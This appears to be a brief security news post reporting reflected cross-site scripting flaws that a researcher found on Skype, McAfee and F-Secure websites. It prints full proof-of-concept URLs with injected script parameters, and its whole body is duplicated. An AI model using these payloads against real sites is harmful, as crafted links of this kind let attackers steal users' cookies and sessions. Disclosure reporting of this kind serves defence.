After an interesting XSS find in Kevin Mitnick's site, Security Researcher Fabián Cuchietti come with more interesting find. This time the he discovered xss vulnerability in Skype, Mcafee and Fsecure websites.
The Phorm page of skype is vulnerable to Cross site scripting.
Poc:
http://about.skype.com/press/enquiry/phorm/phorm.php?PHORM_CONFIG=%22%3E%3Cbody%20onload=alert%28document.cookie%29%3E
McAfee:
https://kc.mcafee.com/corporate/index?page=content&channel=%27%22%20onmouseover=prompt%28090943%29%20bad=%22%20//
F-Secure:
https://kb.f-secure.com/display/2/loginSecureFrame.aspx?cpid=%22%20onmouseover=prompt%2883893%29%20bad=%22%20//&c=3&cpc=3&cid=3&t=3&aid=3&cat=3&catURL=3&r=0.490020453929901
The XSS Vulnerability discovered on these sites could allow an attacker to steal cookies if he manages to convince the users to click on a specially crafted link.
The Phorm page of skype is vulnerable to Cross site scripting.
Poc:
http://about.skype.com/press/enquiry/phorm/phorm.php?PHORM_CONFIG=%22%3E%3Cbody%20onload=alert%28document.cookie%29%3E
McAfee:
https://kc.mcafee.com/corporate/index?page=content&channel=%27%22%20onmouseover=prompt%28090943%29%20bad=%22%20//
F-Secure:
https://kb.f-secure.com/display/2/loginSecureFrame.aspx?cpid=%22%20onmouseover=prompt%2883893%29%20bad=%22%20//&c=3&cpc=3&cid=3&t=3&aid=3&cat=3&catURL=3&r=0.490020453929901
The XSS Vulnerability discovered on these sites could allow an attacker to steal cookies if he manages to convince the users to click on a specially crafted link.
